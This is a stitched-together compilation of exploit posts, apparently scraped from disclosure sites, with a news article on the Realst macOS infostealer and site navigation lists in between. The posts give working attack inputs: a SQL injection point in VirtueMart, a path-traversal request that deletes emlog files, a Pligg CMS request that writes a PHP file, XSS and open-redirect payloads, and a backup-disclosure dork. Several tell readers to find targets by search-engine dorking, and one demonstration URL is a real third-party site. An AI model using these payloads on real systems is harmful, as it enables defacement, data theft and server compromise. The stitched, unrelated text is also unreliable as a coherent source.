Joomla VirtueMart component version 2.6.12.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Joomla VirtueMart v2.6.12.2 SQL Injection Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://dev.virtuemart.net/attachments/863/com_virtuemart.2.6.12.2.zip                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : index.php/headgear/results,1-60?filter_product=1[+] http://127.0.0.1/Virtue/index.php/headgear/results,1-60?filter_product=1 = inject her[+] http://127.0.0.1/Virtue/administrator/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Joomla VirtueMart 2.6.12.2 SQL Injection

emlog 2.1.9 is vulnerable to Arbitrary file deletion via admin\template.php.

First log in to the home page of the background using the administrator account  
Open the admin\\template.php template

**../../hello.txt** This location is the root directory file to be deleted

poc:  
GET /emlog/admin/template.php?action=del&tpl=**../../hello.txt**&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Referer: http://127.0.0.1/emlog/admin/template.php  
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM\_AUTHCOOKIE\_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

CVE-2023-37049: emlogcms has an arbitrary file deletion vulnerability · Issue #1 · Num-Nine/CVE

A new malware family called Realst has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system.
Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and

Cryptocurrency / Endpoint Security

A new malware family called **Realst** has become the latest to target Apple macOS systems, with a third of the samples already designed to infect macOS 14 Sonoma, the upcoming major release of the operating system.

Written in the Rust programming language, the malware is distributed in the form of bogus blockchain games and is capable of "emptying crypto wallets and stealing stored password and browser data" from both Windows and macOS machines. Realst was first discovered in the wild by security researcher iamdeadlyz.

"Realst Infostealer is distributed via malicious websites advertising fake blockchain games with names such as Brawl Earth, WildWorld, Dawnland, Destruction, Evolion, Pearl, Olymp of Reptiles, and SaintLegend," SentinelOne security researcher Phil Stokes said in a report. "Each version of the fake blockchain game is hosted on its own website complete with associated Twitter and Discord accounts."

The cybersecurity firm, which identified 16 variants across 59 samples, said the activity likely has links to another information stealer campaign called Pureland, which came to light earlier this March. Windows machines, on the other hand, are infected with RedLine Stealer.

The attack chains begin with threat actors approaching potential victims through direct messages on social media, convincing them to test a game as part of a paid collaboration, only to drain their cryptocurrency wallets and steal sensitive information upon execution.

The web browsers targeted for harvesting include Brave, Google Chrome, Mozilla Firefox, Opera, and Vivaldi. Apple Safari is a notable exception. The malware is also capable of gathering information from Telegram and capturing screenshots.

"Most variants attempt to grab the user's password via osascript and AppleScript spoofing and perform rudimentary checking that the host device is not a virtual machine via sysctl -n hw.model," Stokes explained.

"The number of Realst samples and their variation shows that the threat actor has invested serious effort in order to target macOS users for data and crypto wallet theft."

News of the Realst stealer follows the discovery of SophosEncrypt, which has been found impersonating cybersecurity firm Sophos and described as a "general-purpose remote access trojan (RAT) with the capacity to encrypt files and generate these ransom notes."

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

The developments come as data captured via commercial information stealers are being packaged and sold for profit on dark web marketplaces and Telegram channels, with over 200,000 OpenAI credentials leaked via stealer logs in 2022 and 2023, according to multiple reports from Bitdefender and Flare.

Stolen enterprise credentials, in particular, can act as a channel for initial access brokers to breach organizations, which can then be auctioned off to other actors looking to exploit the foothold for follow-on activities such as ransomware deployment.

According to IBM's Cost of a Data Breach Report 2023, which examined data breaches experienced by 553 organizations across 16 countries between March 2022 and March 2023, the global average cost of a data breach in 2023 stands at $4.45 million, a 15.3% increase from $3.86 million in 2020.

The study also found that "data breaches led to an increase in the pricing of their business offerings, passing on costs to consumers," a trend observed in 2022 as well.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Rust-based Realst Infostealer Targeting Apple macOS Users' Cryptocurrency Wallets

Pligg CMS v2.0.2 (also known as Kliqqi) was discovered to contain a remote code execution (RCE) vulnerability in the component admin_editor.php.

admin\_editor.php  
Arbitrary file read vulnerability: Post the\_file (the path to the file to be read).

  
  

Arbitrary file upload RCE vulnerability: Post updatefile (the content to be modified) and the\_file2 (the path to save the file).  

    Host: 192.168.2.14
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 148
    Origin: http://192.168.2.14
    Connection: close
    Referer: http://192.168.2.14/pligg-cms/admin/admin_editor.php
    Cookie: panelState=; PHPSESSID=10b67e196207898bd4ae3032a846c574; mnm_user=admin; mnm_key=YWRtaW46MjJrTkdHVDVLbG9NWTpiMzJmYTE4Mjc1MmE2YjBiZGMwNzY3NmM3ZGZkY2UzNQ%3D%3D
    Upgrade-Insecure-Requests: 1
    
    the_file2=c:\phpstudy_pro\www\pligg-cms\phpinfo.php&updatedfile=%3C%3Fphp+phpinfo%28%29%3B%3F%3E%0D%0Ahack+TestIng%0D%0A&isempty=1&save=Save+Changes

CVE-2023-37677: Users with specific permissions can read arbitrary files and modify files to cause remote command execution in admin_editor.php · Issue #264 · Kliqqi-CMS/Kliqqi-CMS

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

Posted Jul 25, 2023

Authored by indoushka

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 13a1ca560e74613eb2d4517f0addb6da665a264ecdfd2a0a3388354bd3480ea9

Download | Favorite | View

**WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting**

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://visitsafinet/wp-admin/admin-ajax.php?action=kc_get_thumbn&type=filter_url&id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,749)
*   Arbitrary (16,156)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,240)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,335)
*   DoS (23,366)
*   Encryption (2,365)
*   Exploit (51,659)
*   File Inclusion (4,213)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,756)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,644)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,139)
*   Proof of Concept (2,338)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,674)
*   Root (3,576)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,638)
*   Security Tool (7,877)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,312)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,716)
*   Web (9,624)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,879)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,995)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,251)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,603)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,760)
*   UNIX (9,270)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress Page Builder KingComposer 2.9.6 Cross Site Scripting

WordPress Page Builder KingComposer plugin version 2.8.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.8.1 XSS Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>[+] http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(1)<%2Fscript>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WordPress Page Builder KingComposer 2.8.1 Cross Site Scripting

WordPress Duplicator plugin version 3.8.7 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress - Duplicator 3.8.7 Backup Disclosure Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : https://snapcreek.com/duplicator/docs/changelog/                                                                   |  | # Dork      : "/wp-content/backups-dup-pro/"                                                                                     |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : "/wp-content/backups-dup-pro/"[+] https://127.0.0.1/pfauen.de/wp-content/backups-dup-pro/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

WordPress Duplicator 3.8.7 Backup Disclosure

CMSctweb Creative version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMSctweb creative v 1.0 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : http://www.contedia.com/                                                                                           |  | # Dork      : "ct web design by brown bear creative" inurl:.php?id=                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /department.php?id=39'<script>alert(/indoushka/);</script>[+] http://www.canterburyct.org/department.php?id=39%27%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMSctweb Creative 1.0 Cross Site Scripting

CMS Ultimate Solutions DreamSus version 1.4 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS Ultimate Solutions DreamSus v1.4 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://dreamsus.com                                                                                                |  | # Dork      : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum'"()%26%25<acx><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>&tpages=4[+] http://127.0.0.1/spcollegejejurieduin/gallery1.php?adjacents=3div_disp=false&gallery_type=Extra%2520Curriculum%27%22()%26%25%3Cacx%3E%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&tpages=4Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS Ultimate Solutions DreamSus 1.4 Cross Site Scripting

WordPress Page Builder KingComposer plugin version 2.9.6 suffers from an open redirection vulnerability.

    ====================================================================================================================================| # Title     : WordPress Page Builder KingComposer 2.9.6 Open Redirect Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://kingcomposer.com/                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/[+] https://example.com/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://packetstormsecurity.com/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#firefox